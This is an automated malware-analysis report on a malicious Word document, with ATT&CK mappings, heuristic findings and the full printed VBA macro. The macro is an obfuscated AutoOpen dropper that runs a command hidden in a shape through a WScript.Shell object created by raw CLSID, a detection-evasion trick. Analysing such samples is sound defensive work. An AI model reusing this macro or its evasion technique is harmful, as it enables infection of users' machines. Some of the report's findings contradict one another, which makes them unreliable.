Risk Score: 292 (MALICIOUS)
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1059.003 Windows Command Shell
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains VBA macros that are configured to execute automatically upon opening. These macros leverage the WScript.Shell COM object to invoke cmd.exe and PowerShell, indicating an attempt to download and execute a secondary payload. The obfuscated command line suggests a complex download and execution chain.
Heuristics (10)
- ClamAV: Doc.Malware.Sload-6777087-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Sload-6777087-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- VBA instantiates a dangerous COM class by CLSID (critical, OLE_VBA_GETOBJECT_CLSID_DANGEROUS): VBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.
  Matched lines in script:
  Set zpFjRBW = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + HQMwOzw)
  On Error Resume Next
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
  Matched lines in script:
  Set zpFjRBW = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + HQMwOzw)
  On Error Resume Next
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro
  Matched lines in script:
  Attribute VB_Customizable = True
  Sub AutoOpen()
  On Error Resume Next
- Suspicious cmd.exe invocation with execution flag (high, SC_STR_CMD): Suspicious cmd.exe invocation with execution flag
- Reference to PowerShell (high, SC_STR_POWERSHELL): Reference to PowerShell
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7603 bytes |

SHA-256: 80532583611be84b4ded96c42ad949b9959910c190a977a4225b12123859c30a

Detection
ClamAV: No threats found
Obfuscation or payload: likely. 115 of 179 identifiers look randomly generated (e.g. 'iInmDTjaNzv'), consistent with name-mangling obfuscation.

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "iInmDTjaNzv"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case qSFiFV
Case 176593762
RkjqtU = Hex(jDcIW)
UKpACCuqP = Cos(78931746)
WzzUHiJzr = 123866763
Case 124231645
iIjvbtd = Hex(iXSVHQ)
DSjVBYt = Sqr(129297158 / CSng(317194285 - Cos(147563730 - 211019213) + USJijCh + Rnd(44056466 - 285617669)))
HTwmuM = Hex(fcMqEGjLz)
End Select
On Error Resume Next
Select Case OWPZG
Case 123802421
zWvltjwZZ = Hex(oziEl)
KGPjzDfC = Cos(257063776)
zTziDfjZ = 44567978
Case 221779699
FUrRX = Hex(tmEnC)
mFSqmut = Sqr(285893376 / CSng(295667817 - Cos(333459047 - 71990123) + daqBJPJz + Rnd(26382225 - 201521290)))
mYPaw = Hex(PivvqNdl)
End Select
On Error Resume Next
Select Case YJjnPuJk
Case 153121641
EtiXizjpa = Hex(rJWLCvjp)
NNbVluFF = Cos(29281143)
YcAwzPq = 141918544
Case 157170618
pmRncz = Hex(nUlTKU)
KfdYt = Sqr(196387076 / CSng(192712795 - Cos(307972471 - 203113868) + BIrNYv + Rnd(75428042 - 174033635)))
Xuavos = Hex(iRkSJNIz)
End Select
On Error Resume Next
Select Case qCYjcC
Case 74160807
QOKsCizmW = Hex(dkvCzTObI)
hvhOGQ = Cos(296776916)
GYWJzSma = 271880502
Case 336084506
XLGbWFP = Hex(oFESBtu)
Vjwlmp = Sqr(71830139 / CSng(211613722 - Cos(329687637 - 163035359) + lcPXiP + Rnd(16858626 - 246937385)))
aTLJr = Hex(FhBGUPEHR)
End Select
Set ppnZv = Shapes("QqIUpbiD")
On Error Resume Next
Select Case YCaIUWfci
Case 302944051
sYCizskD = Hex(ptmhpNW)
jFwpHVKi = Cos(15537758)
hJCvA = 230079606
Case 69565347
irbpohTrJ = Hex(QtSHAvvZ)
wkDsAujDt = Sqr(176962448 / CSng(301326538 - Cos(291694381 - 20956679) + qiiJrQP + Rnd(145582510 - 107026275)))
iRIqZJ = Hex(zalOO)
End Select
On Error Resume Next
Select Case nmsIMAqzV
Case 145706481
OzcrDIzzi = Hex(uWdAdh)
wwzNUjMsq = Cos(260319119)
kFCbUJXPU = 322612991
Case 113804233
TGJatPOI = Hex(TvwXWitT)
wNUwMY = Sqr(117589001 / CSng(125228753 - Cos(15154373 - 136004325) + ONwhLfG + Rnd(76991288 - 41597964)))
cbiRRK = Hex(Ewadw)
End Select
zkqPqPEG = "" + SVukI + tfTFwQ + chMwVlpj + ppnZv.TextFrame.TextRange.Text + NODuzS + dsKMa
On Error Resume Next
Select Case iSwOR
Case 341340570
bipUEWO = Hex(FNXUpNDd)
vYcELC = Cos(18288008)
UzVXmW = 224753650
Case 174426422
UONOwCwcP = Hex(jhstf)
fStXUQfm = Sqr(52473220 / CSng(237973600 - Cos(151638143 - 300756351) + Trours + Rnd(271479315 - 101128090)))
zWjbv = Hex(VibFq)
End Select
On Error Resume Next
Select Case wlNUXfcjd
Case 222675151
YWwiR = Hex(JVoGzcMMi)
wzjYtJL = Cos(129459040)
wNEjUYIA = 152760006
Case 188780820
rZGTz = Hex(LlzJBI)
JdjuJGOK = Sqr(191839566 / CSng(327543468 - Cos(123613120 - 220592647) + lUiqb + Rnd(269092684 - 235791724)))
iZtPbiwa = Hex(awFOaq)
End Select
On Error Resume Next
Select Case ilRLi
Case 232345182
LdDNz = Hex(jVrwlMim)
ffOfUkmm = Cos(218372567)
DZhCif = 214669908
Case 36710983
cSjii = Hex(QXmuprRV)
FlzDOTYqW = Sqr(339979559 / CSng(314656958 - Cos(47136418 - 10676961) + JQEGjJ + Rnd(90010404 - 312629450)))
jzDMA = Hex(rVlDjwzid)
End Select
On Error Resume Next
Select Case RYPwQaLw
Case 247483045
PwIzM = Hex(QGmPUXQ)
GEfVW = Cos(280939674)
zPnbQZs = 222667677
Case 11454302
KbUwo = Hex(ksRVWNtT)
IGrLvqZui = Sqr(119084423 / CSng(216616246 - Cos(143458019 - 158929839) + DYYkJJwwM + Rnd(118741274 - 121986413)))
dEUDkVThI = Hex(AVGPkj)
End Select
On Error Resume Next
Select Case khHvlEjKo
Case 327114310
FERKB = Hex(MMfwoC)
PGhAza = Cos(59040453)
zilviQ = 293455400
Case 247517069
ZjYmJtnTi = Hex(uLftwisf)
WjMOotH = Sqr(172737929 / CSng(213112172 - Cos(99212125 - 124681621) + UbmYE + Rnd(200867014 - 189808307)))
NtjPq = Hex(ASkpQq)
End Select
Set zpFjRBW = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + HQMwOzw)
On Error Resume Next
Select Case VjJzDHtUX
Case 18897691
ilvjvjmZE = Hex(jsnhw)
mmlZUOGlS = Cos(51671107)
ZVnLvfmRj = 114746456
Case 30553963
TQocppnVS = Hex(MGhlc)
UfJRnlM = Sqr(28140398 / CSng(116834274 - Cos(296290303 - 239254800) + AQRdin + Rnd(122557321 - 63895743)))
lRvimdUI = Hex(dKCJwBHn)
End Select
On Error Resume Next
Select Case OVKiavzpj
Case 221132927
LPrRj = Hex(DZZYrGp)
wZYqKK = Cos(25050622)
NnNWMwJK = 322692278
Case 176774328
wNLlo = Hex(kChWXXP)
SdWYwZX = Sqr(321693798 / CSng(170115082 - Cos(9599548 - 24949137) + JSGQP + Rnd(182175281 - 108129704)))
szlok = Hex(ZHWPqQ)
End Select
On Error Resume Next
Select Case AHHLF
Case 52629287
JlZYZFzUA = Hex(ZcwtdE)
HodTrnjKR = Cos(177297043)
WtEVCRiV = 232654319
Case 5709937
XfIOJT = Hex(cMWDODQi)
RzpOHiJ = Sqr(327815452 / CSng(49306926 - Cos(68893772 - 26929633) + hPIUrsR + Rnd(329664313 - 69038397)))
iPcpORT = Hex(AEYqMXt)
End Select
On Error Resume Next
Select Case FsaXDSBpb
Case 198789829
ipQFEtcG = Hex(ZaEQTo)
QXzotUU = Cos(304001646)
QfhID = 314956561
Case 324917293
TrpjPpXad = Hex(PfoJEOslR)
pmKVVvo = Sqr(91034715 / CSng(310936736 - Cos(331512196 - 89200067) + cGzcwqA + Rnd(221364631 - 188067519)))
PdEOVG = Hex(SQSdVIj)
End Select
Const rVrIS = 0
On Error Resume Next
Select Case ouBKZL
Case 267343171
jfQdhYO = Hex(TiNCHsX)
jjLWdjia = Cos(209682394)
batQK = 303397753
Case 44012612
oLnnt = Hex(KiPJW)
GvXSa = Sqr(297750185 / CSng(64046 - Cos(117659341 - 315801623) + zpzcz + Rnd(261847519 - 239648332)))
XTvFE = Hex(vwnEMz)
End Select
On Error Resume Next
Select Case upFEnBI
Case 327947516
sDKLwjJE = Hex(MPnsmkwfd)
AbNZZ = Cos(237618905)
Pqfkk = 118979471
Case 210404175
rFDuaXq = Hex(HlqiBD)
GHXCwNf = Sqr(196367284 / CSng(243951550 - Cos(179644608 - 321163522) + SYFbzH + Rnd(106782011 - 306771080)))
ulCjJPF = Hex(jBAMVZdM)
End Select
zpFjRBW.Run# zkqPqPEG, rVrIS
On Error Resume Next
Select Case HrzvRn
Case 253475972
thwcnb = Hex(LDkanjDvn)
VXJLA = Cos(214466582)
RlTXk = 187051212
Case 231717698
QLYriIobl = Hex(WfcriDvJ)
vQcFtBtKB = Sqr(49048105 / CSng(144659092 - Cos(177219579 - 175907146) + jWXfE + Rnd(35559187 - 298468547)))
vYfdBaZH = Hex(cainio)
End Select
End Sub